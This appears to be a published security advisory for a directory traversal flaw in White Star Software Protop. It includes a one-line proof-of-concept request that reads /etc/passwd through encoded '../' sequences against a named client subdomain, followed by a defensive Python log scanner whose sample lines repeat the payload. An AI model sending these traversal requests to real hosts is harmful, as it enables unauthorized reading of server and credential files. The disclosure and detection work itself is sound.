@stSLAYER
Last active July 8, 2025 14:19
CVE-2025-44177 - Local File Inclusion in White Star Software Protop v4.4.2-2024-11-27

Discovered by: Imraan Khan (Lich-Sec)
Date: 2025-03-13
Product: White Star Software Protop
Version: 4.4.2-2024-11-27
CVE ID: CVE-2025-44177

Vulnerability Summary

A directory traversal vulnerability exists in White Star Software Protop v4.4.2-2024-11-27, specifically in the /pt3upd/ endpoint. An unauthenticated attacker can remotely access arbitrary files on the server by sending crafted requests using encoded traversal sequences.

Affected Instances

This affects all client environments hosted on subdomains such as *.protop.co.za (e.g., client.protop.co.za).

Mitigation

The vendor has released an updated patch. Update to the latest version.

References

CVE ID: CVE-2025-44177 (pending publication)
URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-44177

Proof of Concept (PoC)

GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1
Host: client.protop.co.za
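
For defenders reviewing web server logs for requests shaped like the one above, the following is an added detection example, not part of the original advisory or the vendor's code. It assumes combined-format access logs; the sample log lines, IP addresses and the `/pt3upd/example-file` path are constructed for illustration.

```python
import re
from urllib.parse import unquote

ENDPOINT = "/pt3upd/"  # endpoint named in the advisory
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def fully_decode(target, max_rounds=5):
    """Percent-decode repeatedly so nested encodings are unwrapped as well."""
    for _ in range(max_rounds):
        decoded = unquote(target)
        if decoded == target:
            break
        target = decoded
    return target

def is_traversal(target):
    """True if a request to ENDPOINT has a '..' path segment after decoding."""
    path = fully_decode(target.split("?", 1)[0]).replace("\\", "/")
    if not path.lower().startswith(ENDPOINT):
        return False
    return ".." in path.split("/")

def flag_lines(lines):
    """Return (source_ip, raw_target) for each log line that matches."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        if m and is_traversal(m.group("target")):
            hits.append((line.split(" ", 1)[0], m.group("target")))
    return hits

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [13/Mar/2025:10:00:01 +0000] '
    '"GET /pt3upd/..%2f..%2f..%2f..%2fetc%2fpasswd HTTP/1.1" 200 1843',
    # Normalization test case: the same pattern with one extra encoding layer.
    '198.51.100.7 - - [13/Mar/2025:10:00:05 +0000] '
    '"GET /pt3upd/%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 0',
    '203.0.113.20 - - [13/Mar/2025:10:01:12 +0000] '
    '"GET /pt3upd/example-file HTTP/1.1" 200 512',
    '203.0.113.20 - - [13/Mar/2025:10:02:40 +0000] '
    '"GET /index.html HTTP/1.1" 200 1024',
]

if __name__ == "__main__":
    for ip, target in flag_lines(SAMPLE_LOG):
        print(f"traversal attempt from {ip}: {target}")
```

A match with a 200 status and a non-trivial response size is the case to prioritise, since it suggests the file was actually served before the patch was applied.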